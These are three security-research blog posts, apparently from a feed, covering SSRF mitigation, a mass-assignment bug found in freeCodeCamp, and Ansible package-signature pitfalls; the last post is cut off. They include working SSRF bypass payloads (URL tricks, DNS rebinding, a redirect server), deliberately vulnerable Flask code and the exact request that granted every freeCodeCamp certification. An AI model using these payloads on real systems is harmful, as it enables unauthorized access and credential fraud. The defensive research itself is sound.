Normal view

There are new articles available, click to refresh the page.
Before yesterdayInclude Security Research Blog

Mitigating SSRF in 2023

Server-Side Request Forgery (SSRF) is a vulnerability that allows an attacker to trick a server-side application to make a request to an unintended location. SSRF, unlike most other specific vulnerabilities, has gained its own spot on the OWASP Top 10 2021. This reflects both how common and how impactful this type of vulnerability has become. It is often the means by which attackers pivot a level deeper into network infrastructure, and eventually gain remote code execution.

In this article we are going to review the different ways of triggering SSRF, the main effective mitigation techniques for it, and discuss which mitigation techniques we believe are most effective from our experience of application security pentests.

SSRF Refresher

Like most vulnerabilities, SSRF is caused by a system naively trusting external input. With SSRF, that external input makes its way into a request, usually a HTTP request.

These two tiny Python Flask applications give a simplified example of the mechanism of SSRF:

admin.py

from flask import Flask

app = Flask(__name__)

@app.route('/admin')
def admin():
    return "Super secret admin panel"

if __name__ == "__main__":
    app.run(host="127.0.0.1", port=8888)

app.py

from flask import Flask, request                                                                                                                                                                                   
import requests

app = Flask(__name__)

@app.route('/get_image')
def get_image():
    image_url = request.args.get('image_url', '')
    if image_url:
        return requests.get(image_url).text
    else:
        return "Please provide an image URL"

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=5000)

The admin app is running on 127.0.0.1:8888, the localhost network, as it is intended to only be used by local application administrators. The main app, which is running on the same machine at port 5000 but (let’s imagine) is exposed to the Internet, has the vulnerable get_image() function. This can be used by an external attacker to forge a server-side request to the internal admin app:

$ curl http://0.0.0.0:5000/get_image?image_url=http://127.0.0.1:8888/admin
Super secret admin panel

This simple example shows the two key elements of an SSRF attack:

  1. The application allows external input to flow into a server-side request.
  2. A resource which should not be available to the attacker can be accessed or manipulated.

An SSRF can either be used to access internal resources that should not be available to an attacker, or used to access external resources in an unintended way. Examples of external resource access would include importing malicious data into an application, or spoofing the source of an attack against a third-party. SSRF against internal resources is more common and usually more impactful, so it’s what we’ll be focusing on in this post.

Failed Attempts at Mitigating SSRF

The most obvious way to mitigate SSRF would be to completely prevent external input from influencing server-side requests. Unfortunately, there are legitimate reasons why an application may need to allow external input. For instance, webhooks are user-defined HTTP callbacks that execute in order to build workflows with third-party infrastructure, and can usually be arbitrary URLs.

But before investigating the case where we need to allow arbitrary user-controlled requests, let’s just focus on the get_image() functionality for now which is trying to fetch an image from an external service.

Incomplete Allowlisting

The get_image() function of app.py is fetching a certain type of image URL so should be much more specific in what user input it accepts. Someone who is unaware of the history of SSRF attacks might think the below is enough to stop any shenanigans:

BASE_URL = "http://0.0.0.0:5000"

@app.route('/get_image')
def get_image():
  image_path = request.args.get('image_path', '')
  if image_path:
    return requests.get(f"{BASE_URL}{image_path}.png").text
  else:
    return "Please provide an image URL"

get_image() now appears to be anchoring the input to the application hostname at the beginning, and the PNG extension at the end. However both can be cut out of the request by taking advantage of features of the URL standard with the payload @127.0.0.1:8888/admin#:

$ curl 'http://0.0.0.0:5000/[email protected]:8888/admin%23'
Super secret admin panel

It’s clearer to show the full request that gets sent by the backend:

>>> requests.get("http://0.0.0.0:5000@127.0.0.1:8888/admin#png").text
'Super secret admin panel'

The BASE_URL becomes HTTP basic authentication credentials due to use of “@”, and “png” becomes a URL fragment due to use of “#”. Both of these get ignored by the admin server and the SSRF succeeds.

We said that this takes advantage of features of the URL standard, but things get wild when you consider that here are multiple URL specifications and that different requests libraries out there tend to implement them slightly differently. This opens the door to bizarre methods for fooling URL parsing by researchers like Orange Tsai.

Overall, limiting the influence of external input is always a good idea, but it’s not a failsafe technique.

Incomplete Blocklisting

The other commonly seen, but even more inadequate approach to SSRF prevention is an incomplete attempt at blocking scary hostnames.

Worst of all is a check that uses a function like urlparse() that just grabs the hostname out of a URL:

from flask import Flask, request
from urllib.parse import urlparse
import requests

app = Flask(__name__)

BLOCKED = ["127.0.0.1", "localhost", "169.254.169.254", "0.0.0.0"]

@app.route('/get_image')
def get_image():
  image_url = request.args.get('image_url', '')
  if image_url:
    if any(b in urlparse(image_url).hostname for b in BLOCKED):                                                                                                                                                      
      return "Hack attempt blocked"
    else:
      return requests.get(image_url).text

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=5000)

There are a large number of payloads which bypass the snippet above, 127.0.0.1 in different numeric formats (decimal, octal, hex etc.), equivalent IPv6 localhost addresses, parsing peculiarities like 127.1, as well as alternative representations of 0.0.0.0, and generally enough variants to make you realize that hand-rolling a blocklist is a cursed idea.

But, without even considering whether the BLOCKED list is any good, there’s a straightforward bypass here. An attacker can just input a domain like localtest.me whose DNS lookup resolves to 127.0.0.1:

$ curl http://0.0.0.0:5000/get_image?image_url=http://127.0.0.1:8888/admin
Hack attempt blocked
$ curl http://0.0.0.0:5000/get_image?image_url=http://localtest.me:8888/admin
Super secret admin panel

This demonstrates that the provided hostname needs to be resolved, so the next stage of evolution of bad mitigations would be the following:

BLOCKED = ["127.0.0.1", "localhost", "169.254.169.254", "0.0.0.0"]

@app.route('/get_image')
def get_image():
  image_url = request.args.get('image_url', '')
  if image_url:
    if any(b in socket.gethostbyname(urlparse(image_url).hostname) for b in BLOCKED):
      return "Hack attempt blocked"
    else:
      return requests.get(image_url).text

Even assuming the blocklist was perfect (this one is far from it), this code is still vulnerable to three different types of time-of-check to time-of-use (TOCTTOU) vulnerability:

  • HTTP Redirects
  • DNS Rebinding
  • Parser differential attacks

HTTP Redirects

A redirect is the most straightforward way to demonstrate the problem of TOCTTOU in the context of HTTP. The attacker hosts the following server:

attackers_redirect.py

from flask import Flask, redirect

app = Flask(__name__)

@app.route('/')
def main():
    return redirect("http://127.0.0.1:8888/admin", code=302)

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=1337)

By causing the vulnerable application to make an SSRF to the attacker server, the attacker server’s hostname bypasses the localhost blocklist, but a redirect is triggered back to localhost, which is not checked:

$ curl http://127.0.0.1:5000/get_image?image_url=http://0.0.0.0:1337
Super secret admin panel

DNS Rebinding

DNS rebinding is an even more devastating technique. It exploits the TOCTTOU that exists between the DNS resolution of a domain when it’s validated, and when the request is actually made.

Services like rbndr.us make this easy; we can use it to generate a URL such as http://7f000001.0a00020f.rbndr.us, which alternates between resolving to 127.0.0.1 and 10.0.2.15, and request that in a loop:

$ while sleep 0.1; do curl http://0.0.0.0:5000/get_image?image_url=http://7f000001.0a00020f.rbndr.us:8888/admin; done
<!doctype html>
<html lang=en>
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Super secret admin panelHack attempt blockedHack attempt blocked

It took a while, but eventually the timings lined up and rbndr.us’s DNS server’s DNS responses to the gethostbyname() check and the requests library were different, allowing the SSRF to succeed. DNS rebinding is fun as it can subvert the logic of applications which assume that DNS records are fixed, rather than malleable values under attacker control.

Parser Differential Attacks

Finally, parser differential attacks are the end-game of the multiple URL standards and implementations mentioned a few sections above, where you’ll sometimes find applications that use one library to check a URL and another to make the request. Their different interpretations of the same string can enable an SSRF exploit to slip through.

Not Returning a Response

Sometimes you’ll find an SSRF that doesn’t return a response to the attacker, perhaps under the assumption that this is unexploitable. This is termed a “Blind SSRF”, and there’s some great resources out there that show how these can often be converted to full SSRF vulnerabilities.

Application Layer Mitigation

So, having been through that journey of failed approaches, let’s talk about the decent techniques for SSRF mitigation. We’ve accepted that sometimes we need to allow users to input arbitrary URLs of requests to make from our infrastructure, how can we stop those requests from doing anything malicious?

As we’ve seen in the previous sections, an effective SSRF mitigation approach needs at least the following capabilities:

  • Blocklist private IP addresses
  • Allowlist only permitted domains (configurable)
  • Check an arbitrary number of redirected domains
  • DNS rebinding protection

All these can be incorporated into an application library. This was the approach Include Security took back in 2016 with the release of our SafeURL libraries. They are designed to be drop-in replacements for HTTP libraries such as Python’s requests. Doyensec recently released a similar library for Golang.

The way these libraries work is by hooking into the lower-level HTTP client libraries of the respective languages (e.g. urllib3 or pycurl). TOCTTOU is prevented by validating the IP we are about to connect to just before opening a socket to the requested website with that IP. An optional configuration can be provided that enables a developer to decide which types of requests to allow, but by default it just blocks any requests to internal IP addresses. Then, a user-friendly interface can be presented similar to the higher-level HTTP libraries that are normally used.

Pros

The main benefit of this approach is that it’s easy to integrate into an application. An application developer can import the library and use it to make requests and the details are taken care of. One could argue that these sorts of libraries should become the default higher-level HTTP requests libraries just as modern XML libraries no longer load external entities without explicit configuration.

Cons

However, there are downsides to this approach. Developers have to remember to use the SSRF-safe library instead of the normal requests library. This can be enforced by static code analyzers on code checkin, but there’s a large number of HTTP client libraries in most languages (e.g. Ruby has faraday, multipart-post, excon, rest-client, httparty, and more) making it easy for the rules to miss some. Further, there’s several places that SSRF vulnerabilities can exist outside of the application. They could occur for instance in HTML to PDF generation services using PhantomJS or Headless Chrome or other types of media conversion where an external process is spawned that circumvents the mitigation. Third-party package dependencies that incidentally make HTTP requests would also not use the SSRF-safe library.

There’s also the burden of maintaining SSRF-safe libraries. While more annoying in some languages than others, the low-level functions that the libraries hook into change over time and there’s always the chance of bugs appearing due to this. As we’ve noted, it’s hard to design perfect blocklists and possible for libraries to miss some detail of address validation – this is particularly evident with IPv6 support which is complex with compatibility protocols such as DNS64, Teredo, and 6to4. Finally, internal hosts may be given globally routable addresses but be firewalled off from external hosts. Ultimately, an application layer library isn’t the best place to defend subtleties in network policy like this.

SSRF Jail

An approach we explored internally but never published is to go one level lower and mitigate SSRF at a level somewhere between the operating system and application layer. Named SSRF Jail, it’s a dynamic library that is installed into a target process and hooks into DNS and networking subsystem calls. For instance, on Linux the getaddrinfo() and connect() functions are hooked in the C standard library such that an opened socket can only connect to configured IP addresses.

The advantage of this approach is that it doesn’t require application library changes, and is more exhaustive so long as the target process doesn’t bypass the C standard library and use syscalls directly (e.g. Golang). The main disadvantage that led us to abandoning this approach is that it is not granular enough – an application may need to permit requests to private IPs in specific circumstances but not in most requests, but the lower-level hooks are indiscriminatory.

Network Controls

We haven’t really addressed the elephant in the room for some readers here, which is “why not just firewall the app”. With all the talk of the tricky problems of application layer blocklisting surely the network is the right place to mitigate SSRF. Firewall rules would prevent any traffic between services and ports unless they needed it for normal functioning.

However this is overall a blunt approach that doesn’t work with many real-world systems. We often see applications where some privileged part of it needs to make HTTP requests to another internal service, but the rest of the application has no need to. Further, firewalls struggle to protect against SSRFs from hitting services running on the localhost that the application is running on (e.g. Redis). An ideal network architecture wouldn’t be setup this way in the first place, but for organizations that haven’t fully bought into microservices (usually for valid reasons) it’s common to see.

Therefore, requiring authentication to internal services and endpoints is important, especially (but not only) if an IP or port can’t be filtered outright. In cloud world things are moving in this direction. A well-known target for SSRF has been the AWS EC2 instance metadata endpoint 169.254.169.254. Enabled by default, the endpoint is a rich source of internal data and credentials that can be accessed via SSRF from an EC2 instance. Outrightly blocking it could be difficult if the application relies on metadata. Version 2 of the instance metadata endpoint was released in 2019, which adds token authentication, but at the time of writing still has to be explicitly configured. GCP and Azure, being second movers, managed to better restrict their metadata endpoints from the get-go.

Request Proxy

The approach to SSRF mitigation that we most like is something of a hybrid between an application- and a network-layer control. It is to proxy egress traffic in a system through a single point which applies security controls.

This concept is implemented by Stripe’s Smokescreen which is an open source CONNECT proxy. It is deployed on your network, where it proxies HTTP traffic between the application and the destination URL and has rules about which hosts it allows to talk to on behalf of the app server. By default Smokescreen validates that traffic isn’t bound for an internal IP, but developers can define allowed or blocked domains in Smokescreen on a per-application basis. After Smokescreen has been fully configured, any other direct HTTP requests made from the application can be blocked in the firewall to force use of the proxy.

The real advantage of this approach is that it deals with SSRF at a level that makes sense, since as we’ve explored, SSRF is both an application- and a network-layer concern. We gain the configurability of the application-layer mitigation, with the exhaustiveness of the network-layer mitigation. We no longer have to rely on every potentially SSRF-prone HTTP request being made in an application to use the right library, and no longer have to count on every internal service having the right firewall and authentication controls applied to it.

Further, there are other advantages to centralizing the location where outbound requests are made. It enables better logging and monitoring, and means that egress comes from a small list of IPs which third parties can allowlist, which simplifies other infrastructure concerns.

Downsides are that this approach can only work if the application supports HTTP CONNECT (although this is usually the case). Smokescreen and its policies must also be built and maintained, so it needs an amount of organizational buy-in to be deployed.

Conclusion

Overall, we looked at a number of SSRF mitigations that don’t work and a number that do. Of those, for more mature organizations we most like the request proxying approach, and zero-trust security architectures that require authentication for all internal services. Failing that, e.g. for companies that don’t yet have resources to setup detailed network controls or maintain their own proxy infrastructure, an anti-SSRF application library applied on any endpoints that accept attacker-controlled input is a good initial mitigation. For defense-in-depth, multiple techniques could be combined together, however this would mean that you end up with multiple identical allowlists/blocklists that have to be kept in sync so is not necessarily recommended.

The post Mitigating SSRF in 2023 appeared first on Include Security Research Blog.

Hunting For Mass Assignment Vulnerabilities Using GitHub CodeSearch and grep.app

This post discusses the process of searching top GitHub projects for mass assignment vulnerabilities. This led to a fun finding in the #1 most starred GitHub project, freeCodeCamp, where I was able to acquire every coding certification – supposedly representing over 6000 hours of study – in a single request.

Searching GitHub For Vulnerabilities

With more than 200 million repositories, GitHub is by far the largest code host. While the vast majority of repositories contain boilerplate code, forks, or abandoned side projects, GitHub also hosts some of the most important open source projects. To some extent Linus’s law – “given enough eyeballs, all bugs are shallow” – has been empirically shown on GitHub, as projects with more stars also had more bug fixes. We might therefore expect the top repositories to have a lower number of security vulnerabilities, especially given the incentives to find vulnerabilities such as bug bounties and CVE fame.

Undeterred by Linus’s law, I wanted to see how quickly I could find a vulnerability in a popular GitHub project. The normal approach would be to dig into the code of an individual project, and learn the specific conventions and security assumptions behind it. Combine with a strong understanding of a particular vulnerability class, such as Java deserialization, and use of code analysis tools to map the attack surface, and we have the ingredients to find fantastic exploits which everyone else missed such as Alvaro Munoz’s attacks on Apache Dubbo.

However, to try and find something fast, I wanted to investigate a “wide” rather than a “deep” approach of vuln-hunting. This was motivated by the beta release of GitHub’s new CodeSearch tool. The idea was to find vulnerabilities through querying for specific antipatterns across the GitHub project corpus.

The vulnerability class I chose to focus on was mass assignment, I’ll describe why just after a quick refresher.

Mass Assignment

A mass assignment vulnerability can occur when an API takes data that a user provides, and stores it without filtering for allow-listed properties. This can enable an attacker to modify attributes that the user should not be allowed to access.

A simple example is when a User model contains a “role” property which specifies whether a user has admin permissions; consider the following User model:

  • name
  • email
  • role

And a user registration function which saves all attributes specified in the request body to a new user instance:

exports.register = (req, res) => {
  user = new User(req.body);
  user.save();}

A typical request from a frontend to this endpoint might look like:

POST /users/register

{
  "name": "test",
  "email": "[email protected]"
}

However, by modifying the request to add the “role” property, a low-privileged attacker can cause its value to be saved. The attacker’s new account will gain administrator privileges in the application:

{
"name": "test",
"email": "[email protected]",
"role": "admin"
}

The mass assignment bug class is #6 on the OWASP API Security Top 10. One of the most notorious vulnerability disclosures, back in 2012, was when researcher Egar Homakov used a mass assignment exploit against GitHub to add his own public key to the Ruby on Rails repository and commit a message directly to the master branch.

Why Mass Assignment?

This seemed like a good vulnerability class to focus on, for several reasons:

  • In the webapp assessments we do, we often find mass assignments, possibly because developers are less aware of this type of vuln compared to e.g. SQL injection.
  • They can be highly impactful, enabling privilege escalation and therefore full control over an application.
  • The huge variety of web frameworks have different ways of preventing/addressing mass assignment.
  • As in the above example, mass assignment vulns often occur on a single, simple line of code, making them easier to search for.

Mass Assignment in Node.js

Mass assignment is well known in some webdev communities, particularly Ruby On Rails. Since Rails 4 query parameters must be explicitly allow-listed before they can be used in mass assignments. Additionally, the Brakeman static analysis scanner has rules to catch any potentially dangerous attributes that have been accidentally allow-listed.

Therefore, it seemed worthwhile to narrow the scope to the current web technologies du jour, Node.js apps, frameworks, and object-relational mappers (ORMs). Among these, there’s a variety of ways that mass assignment vulnerabilities can manifest, and less documentation and awareness of them in the community.

To give examples of different ways mass assignment can show up, in the Mongoose ORM, the findOneAndUpdate() method could facilitate a mass assignment vulnerability if taking attributes directly from the user:

const filter = {_id: req.body.id};
const update = req.body;
const updatedUser = await User.findOneAndUpdate(filter, update);

In the sophisticated Loopback framework, model access is defined in ACLs, where an ACL like the following on a user model would allow a user to modify all their own attributes:

{
"accessType": "*",
"principalType": "ROLE",
"principalId": "$owner",
"permission": "ALLOW",
"property": "*"
},

In the Adonis.js framework, any of the following methods could be used to assign multiple attributes to an object:

User.fill(), User.create(), User.createMany(), User.merge(), User.firstOrCreate(), User.fetchOrCreateMany(), User.updateOrCreate(), User.updateOrCreateMany()

The next step was to put together a shortlist of potentially-vulnerable code patterns like these, figure out how to search for them on GitHub, then filter down to those instances which actually accept user-supplied input.

Limitations of GitHub Search

GitHub’s search feature has often been criticized, and does not feel like it lives up to its potential. There are two major problems for our intended use-case:

  1. Global code searches of GitHub turns up an abundance of starter/boilerplate projects that have been abandoned years ago, which aren’t relevant. There is a “stars” operator to only return popular projects, e.g. stars:>1000, but it only works when searching metadata such as repository names and descriptions, not when searching through code.
  2. The following characters are ignored in GitHub search: .,:;/\`'"=*!?#$&+^|~<>(){}[]@. As key syntactical characters in most languages, it’s a major limitation that they can’t be searched for.

The first two results when searching for “user.update(req.body)” illustrate this:

The first result looks like it might be vulnerable, but is a project with zero stars that has had no commits in years. The second result is semantically different than what we searched. Going through all 6000+ results when 99% of the results are like this is tedious.

These restrictions previously led some security researchers to use Google BigQuery to run complex queries against the 3 terabyte GitHub dataset that was released in 2016. While this can produce good results, it doesn’t appear that the dataset has been updated recently. Further, running queries on such a large amount of data quickly becomes prohibitively expensive.

GitHub CodeSearch

GitHub’s new CodeSearch tool is currently available at https://cs.github.com/ for those who have been admitted to the technology preview. The improvements include exact string search, an increased number of filters and boolean operators, and better search indexing. The CodeSearch index right now includes 7 million public repositories, chosen due to popularity and recent activity.

Trying the same query as before, the results load a lot faster and look more promising too:

The repositories showing up first actually have stars, however they all have less than 10. Unfortunately only 100 results are currently returned from a query, and once again, none of the repositories that showed up in my searches were particularly relevant. I looked for a way to sort by stars, but that doesn’t exist. So for our purposes, CodeSearch solves one of the problems with GitHub search, and is likely great for searching individual codebases, but is not yet suitable for making speculative searches across a large number of projects.

grep.app

Looking for a better solution, I stumbled across a third-party service called grep.app. It allows exact match and regex searches, and has only indexed 0.5 million GitHub repositories, therefore excluding a lot of the noise that has clogged up the results so far.

Trying the naïve mass assignment search once again:

Only 22 results are returned, but they are high-quality results! The first repo shown has over 800 stars. I was excited – finally, here was a search engine which could make the task efficient, especially with regex searches.

With the search space limited to top GitHub projects, I could now search for method names and get a small enough selection of results to scan through manually. This was important as “req.body” or other user input usually gets assigned to another variable before being used in a database query. To my knowledge there is no way to express these data flows in searches. CodeQL is great for tracking malicious input (taint tracking) over a small number of projects, but it can’t be used to make a “wide” query across GitHub.

Mass Assignment In FreeCodeCamp

Searching for “user.updateAttributes(“, the first match was for freeCodeCamp, the #1 most starred GitHub project, with over 350k stars:

Looking at the code in the first result, we appeared to have a classic mass assignment vulnerability:

function updateUserFlag(req, res, next) {
const { user, body: update } = req;
return user.updateAttributes(update, createStandardHandler(req, res, next));
}

Acquiring All Certifications on freeCodeCamp

The next step was to ensure that this function could be reached from a public-facing route within the application, and it turned out to be as simple as a PUT call to /update-user-flag: a route originally added in order that you could change your theme on the site.

I created an account on freeCodeCamp’s dev environment, and also looked at the user model in the codebase to find what attributes I could maliciously modify. Although freeCodeCamp did not have roles or administrative users, all the certificate information was stored in the user model.

Therefore, the exploit simply involved making the following request:

PUT /update-user-flag HTTP/2
Host: api.freecodecamp.dev
Cookie: _csrf=lsCzfu4[...]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.freecodecamp.dev/
Csrf-Token: Tu0VHrwW-GJvZ4ly1sVEXjHxSzgPLLj99OLQ
Content-Type: application/json
Origin: https://www.freecodecamp.dev
Content-Length: 518
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Te: trailers

{
  "name": "Mass Assignment",
  "isCheater": false,
  "isHonest": true,
  "isInfosecCertV7":true,
  "isApisMicroservicesCert":true,
  "isBackEndCert":true,
  "is2018DataVisCert":true,
  "isDataVisCert":true,
  "isFrontEndCert":true,
  "isFullStackCert":true,
  "isFrontEndLibsCert":true,
  "isInfosecQaCert":true,
  "isQaCertV7":true,
  "isInfosecCertV7":true,
  "isJsAlgoDataStructCert":true,
  "isRelationalDatabaseCertV8":true,
  "isRespWebDesignCert":true,
  "isSciCompPyCertV7":true,
  "isDataAnalysisPyCertV7":true,
  "isMachineLearningPyCertV7":true
}

After sending the request, a bunch of signed certifications showed up on my profile, each one supposedly requiring 300 hours of work.

Some aspiring developers use freeCodeCamp certifications as evidence of their coding skills and education, so anything that calls into question the integrity of those certifications is bad for the platform. There are certainly other ways to cheat, but those require more effort than sending a single request.

I reported this to freeCodeCamp, and they promptly fixed the vulnerability and released a GitHub security advisory.

Conclusion

Overall, it turned out that a third-party service, grep.app, is much better than both GitHub’s old and new search for querying across a large number of popular GitHub projects. The fact that we were able to use it to so quickly discover a vuln in a top repository suggests there’s a lot more good stuff to find. The key was to be highly selective so as to not get overwhelmed by results.

I expect that GitHub CodeSearch will continue to improve, and hope they will offer a “stars” qualifier by the time the feature reaches general availability.

The post Hunting For Mass Assignment Vulnerabilities Using GitHub CodeSearch and grep.app appeared first on Include Security Research Blog.

Hack Series: Is your Ansible Package Configuration Secure?

In our client assessment work hacking software and cloud systems of all types, we’re often asked to look into configuration management tools such as Ansible. In this post we’ll deep dive into what package management vulnerabilities in the world of Ansible look like. First we’ll recap what Ansible is, provide some tips for security pros to debug it at a lower level, and explore both a CVE in the dnf module and an interesting gotcha in the apt module.

To ensure we’re always looking out for DevSecOps and aiding defenders, our next post in this series will touch on the strengths and weaknesses of tools like Semgrep for catching vulnerabilities in Ansible configurations.

Ansible

Ansible is an open source, Python-based, configuration management tool developed by Red Hat. It enables DevOps and other system maintainers to easily write automation playbooks, composed of a series of tasks in YAML format, and then run those playbooks against targeted hosts.

A key feature of Ansible is that it is agentless: the targeted hosts don’t need to have Ansible installed, just Python and SSH. The machine running the playbook (“control node” in Ansible speak) copies the Python code required to run the tasks to the targeted hosts (“managed nodes”) over SSH, and then executes that code remotely. Managed nodes are organized into groups in an “inventory” for easy targeting by playbooks.

Credit: codingpackets.com

In 2019 Ansible was the most popular cloud configuration management tool. While the paradigm of “immutable infrastructure” has led to more enthusiasm for choosing Terraform and Docker for performing several tasks that previously might have been done by Ansible, it is still an immensely popular tool for provisioning resources, services, and applications.

Ansible provides a large number of built-in modules, which are essentially high-level interfaces for calling common system commands like apt, yum, or sysctl. The modules are Python files that do the work of translating the specified YAML tasks into the commands that actually get executed on the managed nodes. For example, the following playbook contains a single Ansible task which uses the apt module to install NGINX on a Debian-based system. Normally an Ansible playbook would be run against a remote host, but in our examples we are targeting localhost for illustrative purposes:

- name: Sample Apt Module Playbook
  hosts: localhost
  become: yes
  become_user: root
  tasks:
    - name: ensure nginx is installed
      apt:
        name: nginx
        state: present

To understand better what this playbook is doing under the hood, let’s use a debugging technique that will come in useful when we look at vulnerabilities later. Since Ansible doesn’t natively provide a way to see the exact commands getting run, we can use a handy strace invocation. strace allows us to follow the flow of system calls that this playbook triggers when run normally under ansible-playbook, even as Ansible forks off multiple child processes (“-f” flag), so we can view the command that ultimately gets executed:

$ sudo strace -f -e trace=execve ansible-playbook playbook.yml 2>&1 | grep apt
[pid 11377] execve("/usr/bin/apt-get", ["/usr/bin/apt-get", "-y", "-o", "Dpkg::Options::=--force-confdef", "-o", "Dpkg::Options::=--force-confold", "install", "nginx"], 0x195b3e0 /* 33 vars */) = 0

Using both strace command line options ("-e trace=execve“) and grep as filters, we are making sure that irrelevant system calls are not output to the terminal; this avoids the noise of all the setup code that both Ansible and the apt module need to run before finally fulfilling the task. Ultimately we can see that the playbook runs the command apt-get install nginx, with a few extra command line flags to automate accepting confirmation prompts and interactive dialogues.

If you are following along and don’t see the apt-get install command in the strace output, make sure NGINX is uninstalled first. To improve performance and prevent unwanted side-effects, Ansible first checks whether a task has already been achieved, and so returns early with an “ok” status if it thinks NGINX is already in the installed state.

Top 10 Tips for Ansible Security Audits

As shown, Ansible transforms tasks declared in simple YAML format into system commands often run as root on the managed nodes. This layer of abstraction can easily turn into a mismatch between what a task appears to do and what actually happens under the hood. We will explore where such mismatches in Ansible’s built-in modules make it possible to create configuration vulnerabilities across all managed nodes.

But first, let’s take a step back and contextualize this by running through general tips if you are auditing an Ansible-managed infrastructure. From an infrastructure security perspective, Ansible does not expose as much attack surface as some other configuration management tools. SSH is the default transport used to connect from the control node to the managed nodes, so Ansible traffic takes advantage of the sane defaults, cryptography, and integration with Linux servers that the OpenSSH server offers. However, Ansible can be deployed in many ways, and best practices may be missed when writing roles and playbooks. Here are IncludeSec’s top 10 Ansible security checks to remember when reviewing a configuration:

  1. Is an old version of Ansible being used which is vulnerable to known CVEs?
  2. Are hardcoded secrets checked into YAML files?
  3. Are managed nodes in different environments (production, development, staging) not appropriately separated into inventories?
  4. Are the control nodes which Ansible is running from completely locked down with host/OS based security controls?
  5. Are unsafe lookups which facilitate template injection enabled?
  6. Are SSHD config files using unrecommended settings like permitting root login or enabling remote port forwarding?
  7. Are alternative connection methods being used (such as ansible-pull) and are they being appropriately secured?
  8. Are the outputs of playbook runs being logged or audited by default?
  9. Is the confidential output of privileged tasks being logged?
  10. Are high-impact roles/tasks (e.g. those that are managing authentication, or installing packages) actually doing what they appear to be?

Whether those tips apply will obviously vary depending on whether the organization is managing Ansible behind a tool like Ansible Tower, or if it’s a startup where all developers have SSH access to production. However, one thing that remains constant is that Ansible is typically used to install packages to setup managed nodes, so configuration vulnerabilities in package management tasks are of particular interest. We will focus on cases where declaring common package management operations in Ansible YAML format can have unintended security consequences.

CVE-2020-14365: Package Signature Ignored in dnf Module

The most obvious type of mismatch between YAML abstraction and reality in an Ansible module would be an outright bug. A recent example of this is CVE-2020-14365. The dnf module installs packages using the dnf package manager, the successor of yum and the default on Fedora Linux. The bug was that the module didn’t perform signature verification on packages it downloaded. Here is an example of a vulnerable task when run on Ansible versions <2.8.15 and <2.9.13:

- name: The task in this playbook was vulnerable to CVE-2020-14365
  hosts: localhost
  become: yes
  become_user: root
  tasks:
    - name: ensure nginx is installed
      dnf:
        name: nginx
        state: present

The vulnerability is severe when targeted by advanced attackers; an opening for supply-chain attack. The lack of signature verification makes it possible for both the package mirror and man-in-the-middle (MITM) attackers on the network in between to supply their own packages which execute arbitrary commands as root on the host during installation.

For more details about how to perform such an attack, this guide walks through injecting backdoored apt packages from a MITM perspective. The scenario was presented a few years ago on a HackTheBox machine.

The issue is exacerbated by the fact that in most cases on Linux distros, GPG package signatures are the only thing giving authenticity and integrity to the downloaded packages. Package mirrors don’t widely use HTTPS (see Why APT does not use HTTPS for the justification), including dnf. With HTTPS transport between mirror and host, the CVE is still exploitable by a malicious mirror but at least the MITM attacks are a lot harder to pull off. We ran a quick test and despite Fedora using more HTTPS mirrors than Debian, some default mirrors selected due to geographical proximity were HTTP-only:

The root cause of the CVE was that the Ansible dnf module imported a Python module as an interface for handling dnf operations, but did not call a crucial _sig_check_pkg() function. Presumably, this check was either forgotten or assumed to be performed automatically in the imported module.

Package Signature Checks Can be Bypassed When Downgrading Package Versions

The dnf example was clearly a bug, now patched, so let’s move on to a more subtle type of mismatch where the YAML interface doesn’t map cleanly to the desired low-level behavior. This time it is in the apt package manager module and is a mistake we have seen in several production Ansible playbooks.

In a large infrastructure, it is common to install packages from multiple sources, from a mixture of official distro repositories, third-party repositories, and in-house repositories. Sometimes the latest version of a package will cause dependency problems or remove features which are relied upon. The solution which busy teams often choose is to downgrade the package to the last version that was working. While downgrades should never be a long-term solution, they can be necessary when the latest version is actively breaking production or a package update contains a bug.

When run interactively from the command line, apt install (and apt-get install, they are identical for our purposes) allows you to specify an older version you want to downgrade to, and it will do the job. But when accepting confirmation prompts automatically (in “-y” mode, which Ansible uses), apt will error out unless the --allow-downgrades argument is explicitly specified. Further confirmation is required since a downgrade may break other packages. But the Ansible apt module doesn’t offer an --allow-downgrades option equivalent; there’s no clear way to make a downgrade work using Ansible.

The first Stackoverflow answer that comes up when searching for “ansible downgrade package” recommends using force: true (or force: yes which is equivalent in YAML):

- name: Downgrade NGINX in a way that is vulnerable
  hosts: localhost
  become: yes
  become_user: root
  tasks:
    - name: ensure nginx is installed
      apt:
        name: nginx=1.14.0-0ubuntu1.2
        force: true
        state: present

This works fine, and without follow-up, this pattern can become a fixture of the configuration which an organization runs regularly across hosts. Unfortunately, it creates a vulnerability similar to the dnf CVE, disabling signature verification.

To look into what is going on, let’s use the strace command line to see the full invocation:

$ sudo strace -f -e trace=execve ansible-playbook apt_force_true.yml 2>&1 | grep apt
[pid 479683] execve("/usr/bin/apt-get", ["/usr/bin/apt-get", "-y", "-o", "Dpkg::Options::=--force-confdef", "-o", "Dpkg::Options::=--force-confold", "--force-yes", "install", "nginx=1.14.0-0ubuntu1.2"], 0x1209b40 /* 33 vars */) = 0

The force: true option has added the --force-yes parameter (as stated in the apt module docs). --force-yes is a blunt hammer that will ignore any problems with the installation, including a bad signature on the downloaded package. If this same apt-get install command is run manually from the command line, it will warn: --force-yes is deprecated, use one of the options starting with --allow instead. And to Ansible’s credit, it also warns in the docs that force “is a destructive operation with the potential to destroy your system, and it should almost never be used.”

So why is use of force: true so prevalent across Ansible deployments we have seen? It’s because there’s no easy alternative for this common downgrade use-case. There are only unpleasant workarounds involving running the full apt install command line using the command or shell modules, before either Apt Pinning or dpkg holding, native methods in Debian-derived distros to hold a package at a previous version, can be used.

On the Ansible issue tracker, people have been asking for years for an allow_downgrade option for the apt module, but two separate pull requests have been stuck in limbo because they do not meet the needs of the project. Ansible requires integration tests for every feature, and they are difficult to provide for this functionality since Debian-derived distros don’t normally host older versions of packages in their default repositories to downgrade to. The yum and dnf modules have had an allow_downgrade option since 2018.

Fixing the Problem

